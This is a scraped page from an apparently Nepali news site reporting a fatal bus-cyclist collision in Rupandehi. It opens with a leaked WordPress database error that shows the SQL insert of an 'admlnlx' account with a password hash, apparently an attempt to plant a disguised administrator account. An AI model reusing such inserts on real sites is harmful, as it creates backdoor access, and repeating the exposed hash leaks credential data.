WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bmoqxkz2TtOVhr.B0GE0mW4a.SlY9l0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:20:18', '', 'admlnlx', 'admlnlx')
रुपन्देही, माघ २६–
रुपन्देहीको तिलोत्तमा नगरपालिकामा बसको ठक्करबाट आज एक साइकलयात्रीको मृत्यु भएको छ ।
पश्चिम क्षेत्रीय ट्राफ्रिक प्रहरी कार्यालय बुटवलका अनुसार तिलोत्तमा नगरपालिका–१६ भूपू सैनिक टोलमा पूर्वबाट पश्चिम जाँदै गरेको बसले बाटो काट्दै गरेको साइकलयात्रीलाई ठक्कर दिँदा सोहि ठाउँ बस्ने अन्दाजी ६४ वर्षीय दुर्गाबहादुर कुँवरको मृत्यु भएको छ ।
बसको ठक्करबाट गम्भीर घाइते भएका उनको उपचारका क्रमम लुम्बिनी अञ्चल अस्पताल बुटवलमा मृत्यु भएको प्रहरीले जनाएको छ ।